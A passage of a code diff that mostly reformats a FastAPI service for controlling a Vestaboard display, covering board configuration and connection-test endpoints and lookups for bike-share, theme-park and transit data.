-    search: str | None = Query(default=None, description="Search in log message or logger name"),
+    search: str | None = Query(default=None, description="Search in log message or logger name")
 ):
     """Get application logs with pagination, filtering, and search.
 
@@ -2659,9 +2701,17 @@ async def get_logs(
     # Validate level if provided
     valid_levels = ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]
     if level and level.upper() not in valid_levels:
-        raise HTTPException(status_code=400, detail=f"Invalid log level: {level}. Valid levels: {valid_levels}")
+        raise HTTPException(
+            status_code=400,
+            detail=f"Invalid log level: {level}. Valid levels: {valid_levels}"
+        )
 
-    logs, total, has_more = _read_logs_from_files(limit=limit, offset=offset, level=level, search=search)
+    logs, total, has_more = _read_logs_from_files(
+        limit=limit,
+        offset=offset,
+        level=level,
+        search=search
+    )
 
     return {
         "logs": logs,
@@ -2669,7 +2719,10 @@ async def get_logs(
         "limit": limit,
         "offset": offset,
         "has_more": has_more,
-        "filters": {"level": level.upper() if level else None, "search": search},
+        "filters": {
+            "level": level.upper() if level else None,
+            "search": search
+        }
     }
 
 
@@ -2683,7 +2736,9 @@ async def get_status():
     settings_service = get_settings_service()
 
     status = StatusResponse(
-        running=_service_running, initialized=service is not None, config_summary=Config.get_summary()
+        running=_service_running,
+        initialized=service is not None,
+        config_summary=Config.get_summary()
     )
     # Add active page ID to config summary
     status.config_summary["active_page_id"] = settings_service.get_active_page_id()
@@ -2711,7 +2766,7 @@ async def start_service(background_tasks: BackgroundTasks):
         if not service.initialize():
             raise HTTPException(
                 status_code=503,
-                detail="Service initialization failed - check board configuration (API key, host, etc.)",
+                detail="Service initialization failed - check board configuration (API key, host, etc.)"
             )
         logger.info("Service initialization successful on retry")
 
@@ -2724,7 +2779,8 @@ async def start_service(background_tasks: BackgroundTasks):
 
     if _service_running:
         return {"status": "started", "message": "Service started successfully"}
-    raise HTTPException(status_code=500, detail="Service failed to start - check logs for details")
+    else:
+        raise HTTPException(status_code=500, detail="Service failed to start - check logs for details")
 
 
 @app.post("/stop")
@@ -2755,7 +2811,7 @@ async def refresh_display():
         return {"status": "success", "message": "Display refreshed successfully"}
     except Exception as e:
         logger.error(f"Error refreshing display: {e}")
-        raise HTTPException(status_code=500, detail=f"Failed to refresh display: {e!s}") from e
+        raise HTTPException(status_code=500, detail=f"Failed to refresh display: {str(e)}") from e
 
 
 def _characters_to_message(characters: list) -> str:
@@ -2773,69 +2829,22 @@ def _characters_to_message(characters: list) -> str:
     """
     # Index-aligned lookup table for codes 0–62
     _LOOKUP = [
-        " ",  # 0
-        "A",
-        "B",
-        "C",
-        "D",
-        "E",
-        "F",
-        "G",
-        "H",
-        "I",
-        "J",  # 1–10
-        "K",
-        "L",
-        "M",
-        "N",
-        "O",
-        "P",
-        "Q",
-        "R",
-        "S",
-        "T",  # 11–20
-        "U",
-        "V",
-        "W",
-        "X",
-        "Y",
-        "Z",  # 21–26
-        "1",
-        "2",
-        "3",
-        "4",
-        "5",
-        "6",
-        "7",
-        "8",
-        "9",
-        "0",  # 27–36
-        "!",
-        "@",
-        "#",
-        "$",
-        "(",
-        ")",  # 37–42
-        " ",  # 43 – undefined
-        "-",  # 44
-        " ",  # 45 – undefined
-        "+",
-        "&",
-        "=",
-        ";",
-        ":",  # 46–50
-        " ",  # 51 – undefined
-        "'",
-        '"',
-        "%",
-        ",",
-        ".",  # 52–56
-        " ",
-        " ",  # 57–58 – undefined
-        "/",
-        "?",  # 59–60
-        " ",  # 61 – undefined
-        "°",  # 62
+        ' ',  # 0
+        'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',  # 1–10
+        'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',  # 11–20
+        'U', 'V', 'W', 'X', 'Y', 'Z',                        # 21–26
+        '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',   # 27–36
+        '!', '@', '#', '$', '(', ')',                         # 37–42
+        ' ',                                                   # 43 – undefined
+        '-',                                                   # 44
+        ' ',                                                   # 45 – undefined
+        '+', '&', '=', ';', ':',                              # 46–50
+        ' ',                                                   # 51 – undefined
+        "'", '"', '%', ',', '.',                              # 52–56
+        ' ', ' ',                                              # 57–58 – undefined
+        '/', '?',                                              # 59–60
+        ' ',                                                   # 61 – undefined
+        '°',                                                   # 62
     ]
 
     lines = []
@@ -2843,13 +2852,13 @@ def _characters_to_message(characters: list) -> str:
         chars = []
         for code in row:
             if 63 <= code <= 71:
-                chars.append(f"{{{code}}}")
+                chars.append(f'{{{code}}}')
             elif 0 <= code < len(_LOOKUP):
                 chars.append(_LOOKUP[code])
             else:
-                chars.append(" ")
-        lines.append("".join(chars))
-    return "\n".join(lines)
+                chars.append(' ')
+        lines.append(''.join(chars))
+    return '\n'.join(lines)
 
 
 @app.get("/board/current-message")
@@ -2916,7 +2925,7 @@ async def send_message(request: MessageRequest):
         return {
             "status": "blocked",
             "message": "Manual sends blocked during silence mode to prevent wake-ups",
-            "silence_mode": True,
+            "silence_mode": True
         }
 
     if not service.vb_client:
@@ -2932,17 +2941,19 @@ async def send_message(request: MessageRequest):
             board_array,
             strategy=transition.strategy,
             step_interval_ms=transition.step_interval_ms,
-            step_size=transition.step_size,
+            step_size=transition.step_size
         )
         if success:
             if was_sent:
                 service.request_board_refresh()
                 return {"status": "success", "message": "Message sent successfully"}
-            return {"status": "success", "message": "Message unchanged, no update needed", "skipped": True}
-        raise HTTPException(status_code=500, detail="Failed to send message")
+            else:
+                return {"status": "success", "message": "Message unchanged, no update needed", "skipped": True}
+        else:
+            raise HTTPException(status_code=500, detail="Failed to send message")
     except Exception as e:
         logger.error(f"Error sending message: {e}")
-        raise HTTPException(status_code=500, detail=f"Failed to send message: {e!s}") from e
+        raise HTTPException(status_code=500, detail=f"Failed to send message: {str(e)}") from e
 
 
 @app.get("/config")
@@ -3001,9 +3012,7 @@ def _build_welcome_template(device_type: str, custom_msg: str) -> list:
     if custom_msg and len(custom_msg) > cols:
         logger.debug(
             "Welcome message truncated from %d to %d characters for %s device",
-            len(custom_msg),
-            cols,
-            device_type,
+            len(custom_msg), cols, device_type,
         )
     return [row.replace("{center}", center_text) for row in rows]
 
@@ -3024,7 +3033,11 @@ async def send_welcome_message():
     # Check silence mode
     if Config.is_silence_mode_active():
         logger.info("Silence mode is active - blocking welcome message to prevent wake-up")
-        return {"status": "blocked", "message": "Welcome message blocked during silence mode", "silence_mode": True}
+        return {
+            "status": "blocked",
+            "message": "Welcome message blocked during silence mode",
+            "silence_mode": True
+        }
 
     # Create a fresh board client with current config values
     # This ensures any config changes from the setup wizard are used
@@ -3034,11 +3047,11 @@ async def send_welcome_message():
             api_key=Config.get_board_api_key(),
             host=Config.BOARD_HOST if not use_cloud else None,
             use_cloud=use_cloud,
-            skip_unchanged=False,  # Always send the welcome message
+            skip_unchanged=False  # Always send the welcome message
         )
     except ValueError as e:
         logger.error(f"Failed to create board client: {e}")
-        raise HTTPException(status_code=503, detail=f"Board not configured: {e!s}") from e
+        raise HTTPException(status_code=503, detail=f"Board not configured: {str(e)}") from e
 
     try:
         # Use custom welcome message if set, otherwise use the default
@@ -3079,25 +3092,26 @@ async def send_welcome_message():
             strategy=transition.strategy,
             step_interval_ms=transition.step_interval_ms,
             step_size=transition.step_size,
-            force=True,  # Force send even if cached
+            force=True  # Force send even if cached
         )
 
         if success:
             if was_sent:
                 logger.info("Welcome message sent to board")
                 return {"status": "success", "message": "Welcome message sent to your board!"}
-            return {"status": "success", "message": "Welcome message unchanged", "skipped": True}
-        raise HTTPException(status_code=500, detail="Failed to send welcome message")
+            else:
+                return {"status": "success", "message": "Welcome message unchanged", "skipped": True}
+        else:
+            raise HTTPException(status_code=500, detail="Failed to send welcome message")
 
     except Exception as e:
         logger.error(f"Error sending welcome message: {e}")
-        raise HTTPException(status_code=500, detail=f"Failed to send welcome message: {e!s}") from e
+        raise HTTPException(status_code=500, detail=f"Failed to send welcome message: {str(e)}") from e
 
 
 # =============================================================================
 # Configuration Management Endpoints
 # =============================================================================
-
 
 @app.get("/config/full")
 async def get_full_config():
@@ -3118,7 +3132,10 @@ async def get_board_config():
     board_config = config_manager.get_board()
     masked = config_manager._mask_sensitive(board_config)
 
-    return {"config": masked, "api_modes": ["local", "cloud"]}
+    return {
+        "config": masked,
+        "api_modes": ["local", "cloud"]
+    }
 
 
 # Deprecated backward compatibility endpoint - redirects to /config/board
@@ -3158,7 +3175,10 @@ async def update_board_config(request: dict):
     updated = config_manager.get_board()
     masked = config_manager._mask_sensitive(updated)
 
-    return {"status": "success", "config": masked}
+    return {
+        "status": "success",
+        "config": masked
+    }
 
 
 # Deprecated backward compatibility endpoint - redirects to /config/board
@@ -3192,22 +3212,17 @@ async def reset_board_config():
     # detects first-run mode regardless of which storage path is checked.
     try:
         from .devices import BoardInstance
-
         settings_svc = get_settings_service()
-        settings_svc.set_boards(
-            [
-                BoardInstance(
-                    name="My Board",
-                    device_type="flagship",
-                    board_color="black",
-                    enabled=True,
-                    api_mode="local",
-                    host="",
-                    local_api_key="",
-                    cloud_key="",
-                ).to_dict()
-            ]
-        )
+        settings_svc.set_boards([BoardInstance(
+            name="My Board",
+            device_type="flagship",
+            board_color="black",
+            enabled=True,
+            api_mode="local",
+            host="",
+            local_api_key="",
+            cloud_key="",
+        ).to_dict()])
     except Exception:  # pragma: no cover - defensive
         logger.exception("Failed to reset multi-board settings during board config reset")
 
@@ -3264,7 +3279,6 @@ async def validate_config():
     has_configured_board_instance = False
     try:
         from .devices import BoardInstance
-
         board_settings = get_settings_service().get_board_settings()
         for b in board_settings.boards or []:
             try:
@@ -3284,12 +3298,16 @@ async def validate_config():
         errors = [e for e in errors if not e.startswith(board_error_prefixes)]
         is_valid = len(errors) == 0
 
-    return {"valid": is_valid, "is_first_run": is_first_run, "errors": errors, "missing_fields": missing_fields}
+    return {
+        "valid": is_valid,
+        "is_first_run": is_first_run,
+        "errors": errors,
+        "missing_fields": missing_fields
+    }
 
 
 class BoardTestRequest(BaseModel):
     """Request model for testing board connection."""
-
     api_mode: str = "local"
     local_api_key: str | None = None
     cloud_key: str | None = None
@@ -3328,7 +3346,11 @@ async def test_board_connection(request: BoardTestRequest):
     # Validate required fields based on mode
     if api_mode == "cloud":
         if not request.cloud_key:
-            return {"success": False, "message": "Cloud API key is required", "error": "Missing cloud_key parameter"}
+            return {
+                "success": False,
+                "message": "Cloud API key is required",
+                "error": "Missing cloud_key parameter"
+            }
         api_key = request.cloud_key
         use_cloud = True
         host = None
@@ -3337,13 +3359,13 @@ async def test_board_connection(request: BoardTestRequest):
             return {
                 "success": False,
                 "message": "Local API key is required",
-                "error": "Missing local_api_key parameter",
+                "error": "Missing local_api_key parameter"
             }
         if not request.host:
             return {
                 "success": False,
                 "message": "Board host/IP is required for Local API",
-                "error": "Missing host parameter",
+                "error": "Missing host parameter"
             }
         api_key = request.local_api_key
         use_cloud = False
@@ -3359,11 +3381,18 @@ async def test_board_connection(request: BoardTestRequest):
 
     try:
         # Create temporary client with provided credentials
-        client = BoardClient(api_key=api_key, host=host, use_cloud=use_cloud, skip_unchanged=False)
+        client = BoardClient(
+            api_key=api_key,
+            host=host,
+            use_cloud=use_cloud,
+            skip_unchanged=False
+        )
 
         # Test the connection directly so we can inspect HTTP status codes
         # (read_current_message() swallows errors and returns None, losing details)
-        response = await asyncio.to_thread(requests.get, client.base_url, headers=client.headers, timeout=10)
+        response = await asyncio.to_thread(
+            requests.get, client.base_url, headers=client.headers, timeout=10
+        )
 
         if response.status_code == 200:
             # Parse the response to verify it's valid board data
@@ -3381,7 +3410,9 @@ async def test_board_connection(request: BoardTestRequest):
                     if isinstance(data, dict)
                     else f"body type: {type(data).__name__}"
                 )
-                logger.warning(f"Board connection test: HTTP 200 but unrecognized response ({api_mode} mode): {detail}")
+                logger.warning(
+                    f"Board connection test: HTTP 200 but unrecognized response ({api_mode} mode): {detail}"
+                )
                 return {
                     "success": False,
                     "message": "Connected to Vestaboard but the response shape was not recognized.",
@@ -3400,7 +3431,7 @@ async def test_board_connection(request: BoardTestRequest):
                     "troubleshooting": [
                         "Wait 30 seconds and try again — the board may still be starting up.",
                         "Try unplugging the board for 10 seconds and plugging it back in.",
-                    ],
+                    ]
                 }
 
         elif response.status_code == 401 or response.status_code == 403:
@@ -3414,19 +3445,20 @@ async def test_board_connection(request: BoardTestRequest):
                         "Go to https://web.vestaboard.com and sign in to your account.",
                         "Make sure you are copying the Read/Write API key (not the subscription key or installable key).",
                         "Paste the key into the Cloud API Key field and try again.",
-                    ],
+                    ]
                 }
-            return {
-                "success": False,
-                "message": f"Your API key was rejected by the board (HTTP {response.status_code}).",
-                "error": f"HTTP {response.status_code}",
-                "troubleshooting": [
-                    "Verify your Local API key is correct — it was provided when you enabled the Local API with your enablement token.",
-                    "If you need a new key, request an enablement token at https://www.vestaboard.com/local-api",
-                    "Paste the correct key into the Local API Key field and try again.",
-                    "If the key was recently regenerated, the old key will no longer work.",
-                ],
-            }
+            else:
+                return {
+                    "success": False,
+                    "message": f"Your API key was rejected by the board (HTTP {response.status_code}).",
+                    "error": f"HTTP {response.status_code}",
+                    "troubleshooting": [
+                        "Verify your Local API key is correct — it was provided when you enabled the Local API with your enablement token.",
+                        "If you need a new key, request an enablement token at https://www.vestaboard.com/local-api",
+                        "Paste the correct key into the Local API Key field and try again.",
+                        "If the key was recently regenerated, the old key will no longer work.",
+                    ]
+                }
 
         elif response.status_code >= 500:
             logger.warning(f"Board connection test: server error HTTP {response.status_code} ({api_mode} mode)")
@@ -3438,7 +3470,7 @@ async def test_board_connection(request: BoardTestRequest):
                     "Try unplugging the Vestaboard for 10 seconds and plugging it back in.",
                     "Wait about a minute for the board to restart, then try again.",
                     "If the problem continues, check for firmware updates in the Vestaboard app.",
-                ],
+                ]
             }
 
         else:
@@ -3451,7 +3483,7 @@ async def test_board_connection(request: BoardTestRequest):
                     "Try unplugging the Vestaboard for 10 seconds and plugging it back in.",
                     "Check for firmware updates in the Vestaboard app.",
                     "If the problem continues, try using the other connection mode (Local or Cloud).",
-                ],
+                ]
             }
 
     except ValueError:
@@ -3460,7 +3492,7 @@ async def test_board_connection(request: BoardTestRequest):
         return {
             "success": False,
             "message": "Board connection configuration is invalid.",
-            "error": "Configuration error",
+            "error": "Configuration error"
         }
     except requests.exceptions.ConnectionError as e:
         logger.error(f"Board connection test error: {e}")
@@ -3473,19 +3505,20 @@ async def test_board_connection(request: BoardTestRequest):
                     "Make sure the device running FiestaBoard has a working internet connection.",
                     "Try opening https://rw.vestaboard.com in a browser to verify the service is reachable.",
                     "If you use a VPN or corporate network, make sure it allows connections to rw.vestaboard.com.",
-                ],
+                ]
             }
-        return {
-            "success": False,
-            "message": "Could not connect to the board. The board may be off or not on the same network.",
-            "error": "Connection error",
-            "troubleshooting": [
-                "Make sure the Vestaboard is powered on (check for the LED on the back).",
-                "Make sure both FiestaBoard and the Vestaboard are on the same Wi-Fi network.",
-                "Double-check the board's IP address — you can find it on your router's admin page or use FiestaBoard's network scan.",
-                "Make sure the Local API is enabled on your board (see https://docs.vestaboard.com/docs/local-api/authentication).",
-            ],
-        }
+        else:
+            return {
+                "success": False,
+                "message": "Could not connect to the board. The board may be off or not on the same network.",
+                "error": "Connection error",
+                "troubleshooting": [
+                    "Make sure the Vestaboard is powered on (check for the LED on the back).",
+                    "Make sure both FiestaBoard and the Vestaboard are on the same Wi-Fi network.",
+                    "Double-check the board's IP address — you can find it on your router's admin page or use FiestaBoard's network scan.",
+                    "Make sure the Local API is enabled on your board (see https://docs.vestaboard.com/docs/local-api/authentication).",
+                ]
+            }
     except requests.exceptions.Timeout as e:
         logger.error(f"Board connection test timeout: {e}")
         if use_cloud:
@@ -3496,19 +3529,20 @@ async def test_board_connection(request: BoardTestRequest):
                 "troubleshooting": [
                     "Check that the device running FiestaBoard has a stable internet connection.",
                     "The Vestaboard cloud service may be experiencing issues — try again in a few minutes.",
-                ],
+                ]
             }
-        return {
-            "success": False,
-            "message": "Connection to the board timed out. The board may be off or the IP address may be wrong.",
-            "error": "Timeout",
-            "troubleshooting": [
-                "Make sure the Vestaboard is powered on.",
-                "Double-check the IP address in the Vestaboard app under Settings.",
-                "Make sure both devices are on the same network.",
-                "Try using the board's IP address instead of a hostname.",
-            ],
-        }
+        else:
+            return {
+                "success": False,
+                "message": "Connection to the board timed out. The board may be off or the IP address may be wrong.",
+                "error": "Timeout",
+                "troubleshooting": [
+                    "Make sure the Vestaboard is powered on.",
+                    "Double-check the IP address in the Vestaboard app under Settings.",
+                    "Make sure both devices are on the same network.",
+                    "Try using the board's IP address instead of a hostname.",
+                ]
+            }
     except Exception as e:
         logger.error(f"Board connection test error: {e}", exc_info=True)
         return {
@@ -3519,20 +3553,18 @@ async def test_board_connection(request: BoardTestRequest):
                 "Make sure the Vestaboard is powered on and connected to your network.",
                 "Try restarting FiestaBoard and the Vestaboard.",
                 "Visit the Network Diagnostics page for a detailed connection check.",
-            ],
+            ]
         }
 
 
 class EnablementTokenRequest(BaseModel):
     """Request model for exchanging enablement token for API key."""
-
     host: str
     enablement_token: str
 
 
 class BoardScanRequest(BaseModel):
     """Request model for network board scanning."""
-
     timeout: float | None = 4.0
 
 
@@ -3558,13 +3590,17 @@ async def enable_local_api(request: EnablementTokenRequest):
     import requests as http_requests
 
     if not request.host:
-        return {"success": False, "message": "Board IP address is required", "error": "Missing host parameter"}
+        return {
+            "success": False,
+            "message": "Board IP address is required",
+            "error": "Missing host parameter"
+        }
 
     if not request.enablement_token:
         return {
             "success": False,
             "message": "Enablement token is required",
-            "error": "Missing enablement_token parameter",
+            "error": "Missing enablement_token parameter"
         }
 
     # Validate the host before composing the URL so an attacker can't
@@ -3593,7 +3629,9 @@ async def enable_local_api(request: EnablementTokenRequest):
     _safe_host = _hm.group(0)
     # Build the URL for the local enablement endpoint
     url = f"http://{_safe_host}:7000/local-api/enablement"
-    headers = {"X-Vestaboard-Local-Api-Enablement-Token": request.enablement_token}
+    headers = {
+        "X-Vestaboard-Local-Api-Enablement-Token": request.enablement_token
+    }
 
     try:
         logger.info(f"Attempting to enable local API on {request.host}")
@@ -3608,27 +3646,29 @@ async def enable_local_api(request: EnablementTokenRequest):
                 return {
                     "success": True,
                     "api_key": api_key,
-                    "message": "Local API enabled successfully! Your API key has been retrieved.",
+                    "message": "Local API enabled successfully! Your API key has been retrieved."
                 }
-            logger.warning(f"Local API enablement response missing apiKey: {data}")
-            return {
-                "success": False,
-                "message": "Received response but no API key was provided",
-                "error": "Board response did not include an apiKey",
-            }
-        if response.status_code == 401 or response.status_code == 403:
+            else:
+                logger.warning(f"Local API enablement response missing apiKey: {data}")
+                return {
+                    "success": False,
+                    "message": "Received response but no API key was provided",
+                    "error": "Board response did not include an apiKey",
+                }
+        elif response.status_code == 401 or response.status_code == 403:
             logger.warning("Local API enablement failed - invalid token")
             return {
                 "success": False,
                 "message": "Invalid enablement token. Please check the token and try again.",
-                "error": f"HTTP {response.status_code}: Unauthorized",
+                "error": f"HTTP {response.status_code}: Unauthorized"
             }
-        logger.warning(f"Local API enablement failed - HTTP {response.status_code}")
-        return {
-            "success": False,
-            "message": f"Board returned an error (HTTP {response.status_code})",
-            "error": f"HTTP {response.status_code}",
-        }
+        else:
+            logger.warning(f"Local API enablement failed - HTTP {response.status_code}")
+            return {
+                "success": False,
+                "message": f"Board returned an error (HTTP {response.status_code})",
+                "error": f"HTTP {response.status_code}",
+            }
 
     except http_requests.exceptions.ConnectionError as e:
         logger.error(f"Local API enablement connection error: {e}")
@@ -3725,7 +3765,10 @@ async def update_general_config(request: dict):
     if not success:
         raise HTTPException(status_code=500, detail="Failed to update general configuration")
 
-    return {"status": "success", "general": general_config}
+    return {
+        "status": "success",
+        "general": general_config
+    }
 
 
 @app.get("/silence-status")
@@ -3786,7 +3829,6 @@ async def get_silence_status():
 
 class SilenceScheduleRequest(BaseModel):
     """Request body for updating the silence schedule feature."""
-
     enabled: bool
     start_time: str
     end_time: str
@@ -3876,7 +3918,6 @@ async def update_silence_schedule(request: SilenceScheduleRequest):
 # Display Source Endpoints
 # =============================================================================
 
-
 @app.get("/displays")
 async def list_displays():
     """
@@ -3887,7 +3928,11 @@ async def list_displays():
     """
     display_service = get_display_service()
     displays = display_service.get_available_displays()
-    return {"displays": displays, "total": len(displays), "available_count": sum(1 for d in displays if d["available"])}
+    return {
+        "displays": displays,
+        "total": len(displays),
+        "available_count": sum(1 for d in displays if d["available"])
+    }
 
 
 @app.get("/displays/{display_type}")
@@ -3915,9 +3960,9 @@ async def get_display(display_type: str):
     return {
         "display_type": result.display_type,
         "message": result.formatted,
-        "lines": result.formatted.split("\n") if result.formatted else [],
-        "line_count": len(result.formatted.split("\n")) if result.formatted else 0,
-        "available": result.available,
+        "lines": result.formatted.split('\n') if result.formatted else [],
+        "line_count": len(result.formatted.split('\n')) if result.formatted else 0,
+        "available": result.available
     }
 
 
@@ -3950,7 +3995,7 @@ async def get_display_raw(display_type: str, response: Response):
         "display_type": result.display_type,
         "data": result.raw,
         "available": result.available,
-        "error": result.error,
+        "error": result.error
     }
 
 
@@ -4002,20 +4047,31 @@ async def get_displays_raw_batch(request: dict):
             if enabled_only and not result.available:
                 continue
 
-            results[display_type] = {"data": result.raw, "available": result.available, "error": result.error}
+            results[display_type] = {
+                "data": result.raw,
+                "available": result.available,
+                "error": result.error
+            }
         except Exception as e:
             logger.error(f"Error fetching display {display_type}: {e}", exc_info=True)
-            results[display_type] = {"data": {}, "available": False, "error": str(e)}
+            results[display_type] = {
+                "data": {},
+                "available": False,
+                "error": str(e)
+            }
 
     return {
         "displays": results,
         "total": len(display_types),
-        "successful": sum(1 for r in results.values() if r.get("available", False)),
+        "successful": sum(1 for r in results.values() if r.get("available", False))
     }
 
 
 @app.post("/displays/{display_type}/send")
-async def send_display(display_type: str, target: str | None = None):
+async def send_display(
+    display_type: str,
+    target: str | None = None
+):
     """
     Send a display to the configured target (ui, board, or both).
 
@@ -4028,7 +4084,10 @@ async def send_display(display_type: str, target: str | None = None):
         Result of the send operation.
     """
     if target is not None and target not in VALID_OUTPUT_TARGETS:
-        raise HTTPException(status_code=400, detail=f"Invalid target: {target}. Valid targets: {VALID_OUTPUT_TARGETS}")
+        raise HTTPException(
+            status_code=400,
+            detail=f"Invalid target: {target}. Valid targets: {VALID_OUTPUT_TARGETS}"
+        )
 
     display_service = get_display_service()
     settings_service = get_settings_service()
@@ -4067,7 +4126,7 @@ async def send_display(display_type: str, target: str | None = None):
             board_array,
             strategy=transition.strategy,
             step_interval_ms=transition.step_interval_ms,
-            step_size=transition.step_size,
+            step_size=transition.step_size
         )
         sent_to_board = was_sent
         if not success:
@@ -4085,7 +4144,6 @@ async def send_display(display_type: str, target: str | None = None):
 # =============================================================================
 # Bay Wheels Station Search Endpoints
 # =============================================================================
-
 
 @app.get("/baywheels/stations")
 async def list_all_baywheels_stations():
@@ -4126,23 +4184,24 @@ async def list_all_baywheels_stations():
                 else:
                     classic += count
 
-            result.append(
-                {
-                    "station_id": station_id,
-                    "name": info.get("name", station_id),
-                    "lat": info.get("lat"),
-                    "lon": info.get("lon"),
-                    "address": info.get("address", ""),
-                    "capacity": info.get("capacity", 0),
-                    "num_bikes_available": status.get("num_bikes_available", 0),
-                    "electric_bikes": electric,
-                    "classic_bikes": classic,
-                    "num_docks_available": status.get("num_docks_available", 0),
-                    "is_renting": status.get("is_renting", 1) == 1,
-                }
-            )
+            result.append({
+                "station_id": station_id,
+                "name": info.get("name", station_id),
+                "lat": info.get("lat"),
+                "lon": info.get("lon"),
+                "address": info.get("address", ""),
+                "capacity": info.get("capacity", 0),
+                "num_bikes_available": status.get("num_bikes_available", 0),
+                "electric_bikes": electric,
+                "classic_bikes": classic,
+                "num_docks_available": status.get("num_docks_available", 0),
+                "is_renting": status.get("is_renting", 1) == 1,
+            })
 
-        return {"stations": result, "total": len(result)}
+        return {
+            "stations": result,
+            "total": len(result)
+        }
     except Exception as e:
         logger.error(f"Error listing Bay Wheels stations: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -4153,7 +4212,7 @@ async def find_nearby_baywheels_stations(
     lat: float = Query(..., description="Latitude"),
     lng: float = Query(..., description="Longitude"),
     radius: float = Query(2.0, description="Search radius in kilometers"),
-    limit: int = Query(10, description="Maximum number of results"),
+    limit: int = Query(10, description="Maximum number of results")
 ):
     """
     Find Bay Wheels stations near a location.
@@ -4210,7 +4269,7 @@ async def find_nearby_baywheels_stations(
             "stations": stations,
             "count": len(stations),
             "search_location": {"lat": lat, "lng": lng},
-            "radius_km": radius,
+            "radius_km": radius
         }
     except Exception as e:
         logger.error(f"Error finding nearby Bay Wheels stations: {e}", exc_info=True)
@@ -4221,7 +4280,7 @@ async def find_nearby_baywheels_stations(
 async def search_baywheels_stations_by_address(
     address: str = Query(..., description="Address to search near"),
     radius: float = Query(2.0, description="Search radius in kilometers"),
-    limit: int = Query(10, description="Maximum number of results"),
+    limit: int = Query(10, description="Maximum number of results")
 ):
     """
     Find Bay Wheels stations near an address.
@@ -4243,8 +4302,14 @@ async def search_baywheels_stations_by_address(
     try:
         # Geocode address using Nominatim
         geocode_url = "https://nominatim.openstreetmap.org/search"
-        geocode_params = {"q": address, "format": "json", "limit": 1}
-        geocode_headers = {"User-Agent": "FiestaBoard-Service/1.0"}
+        geocode_params = {
+            "q": address,
+            "format": "json",
+            "limit": 1
+        }
+        geocode_headers = {
+            "User-Agent": "FiestaBoard-Service/1.0"
+        }
 
         geocode_response = await asyncio.to_thread(
             requests.get, geocode_url, params=geocode_params, headers=geocode_headers, timeout=10
@@ -4299,13 +4364,13 @@ async def search_baywheels_stations_by_address(
             "count": len(stations),
             "search_address": address,
             "geocoded_location": {"lat": lat, "lng": lng, "display_name": location.get("display_name", "")},
-            "radius_km": radius,
+            "radius_km": radius
         }
     except HTTPException:
         raise
     except requests.exceptions.RequestException as e:
         logger.error(f"Error geocoding address: {e}", exc_info=True)
-        raise HTTPException(status_code=503, detail=f"Geocoding service unavailable: {e!s}") from e
+        raise HTTPException(status_code=503, detail=f"Geocoding service unavailable: {str(e)}") from e
     except Exception as e:
         logger.error(f"Error searching Bay Wheels stations: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -4353,10 +4418,7 @@ async def list_disney_parks():
         for group in data:
             if group.get("id") == DISNEY_GROUP_ID:
                 parks = group.get("parks", [])
-                out = [
-                    {"id": p["id"], "name": p["name"], "country": p.get("country"), "timezone": p.get("timezone")}
-                    for p in parks
-                ]
+                out = [{"id": p["id"], "name": p["name"], "country": p.get("country"), "timezone": p.get("timezone")} for p in parks]
                 out.sort(key=lambda x: (x.get("name") or "").lower())
                 return out
         return []
@@ -4388,7 +4450,6 @@ async def list_park_rides(park_id: int):
 # MUNI Endpoints
 # =============================================================================
 
-
 @app.get("/muni/stops")
 async def list_all_muni_stops():
     """
@@ -4416,25 +4477,27 @@ async def list_all_muni_stops():
         # Note: 511.org requires an API key for most endpoints
         # We'll use the configured MUNI API key
         from src.config import Config
-
         api_key = Config.MUNI_API_KEY
 
         if not api_key:
             raise HTTPException(status_code=400, detail="MUNI API key not configured")
 
         url = "http://api.511.org/transit/stops"
-        params = {"api_key": api_key, "operator_id": "SF", "format": "json"}
+        params = {
+            "api_key": api_key,
+            "operator_id": "SF",
+            "format": "json"
+        }
 
         response = await asyncio.to_thread(requests.get, url, params=params, timeout=15)
         response.raise_for_status()
 
         # Handle BOM if present
         content = response.text
-        if content.startswith("\ufeff"):
+        if content.startswith('\ufeff'):
             content = content[1:]
 
         import json
-
         data = json.loads(content)
 
         # Parse stops from the Contents.dataObjects.ScheduledStopPoint array
@@ -4453,17 +4516,18 @@ async def list_all_muni_stops():
             # Get stop name
             name = stop.get("Name", stop_code)
 
-            stops.append(
-                {
-                    "stop_code": stop_code,
-                    "stop_id": stop_id,
-                    "name": name,
-                    "lat": float(lat) if lat else None,
-                    "lon": float(lon) if lon else None,
-                }
-            )
+            stops.append({
+                "stop_code": stop_code,
+                "stop_id": stop_id,
+                "name": name,
+                "lat": float(lat) if lat else None,
+                "lon": float(lon) if lon else None,
+            })
 
-        result = {"stops": stops, "total": len(stops)}
+        result = {
+            "stops": stops,
+            "total": len(stops)
+        }
 
         # Update cache
         with _muni_stops_cache_lock:
@@ -4482,7 +4546,7 @@ async def find_nearby_muni_stops(
     lat: float = Query(..., description="Latitude"),
     lng: float = Query(..., description="Longitude"),
     radius: float = Query(0.5, description="Search radius in kilometers"),
-    limit: int = Query(10, description="Maximum number of results"),
+    limit: int = Query(10, description="Maximum number of results")
 ):
     """
     Find Muni stops near a location.
@@ -4516,7 +4580,7 @@ async def find_nearby_muni_stops(
             dlat = lat2_rad - lat1_rad
             dlon = lon2_rad - lon1_rad
 
-            a = math.sin(dlat / 2) ** 2 + math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin(dlon / 2) ** 2
+            a = math.sin(dlat / 2)**2 + math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin(dlon / 2)**2
             c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
 
             return R * c
@@ -4541,7 +4605,6 @@ async def find_nearby_muni_stops(
         # Try to get routes serving each stop from regional transit cache
         try:
             from src.utils.transit_cache import get_transit_cache
-
             cache = get_transit_cache()
 
             if cache.is_ready():
@@ -4580,7 +4643,7 @@ async def find_nearby_muni_stops(
             "stops": nearby_stops,
             "count": len(nearby_stops),
             "search_location": {"lat": lat, "lng": lng},
-            "radius_km": radius,
+            "radius_km": radius
         }
 
     except Exception as e:
@@ -4592,7 +4655,7 @@ async def find_nearby_muni_stops(
 async def search_muni_stops_by_address(
     address: str = Query(..., description="Address to search near"),
     radius: float = Query(0.5, description="Search radius in kilometers"),
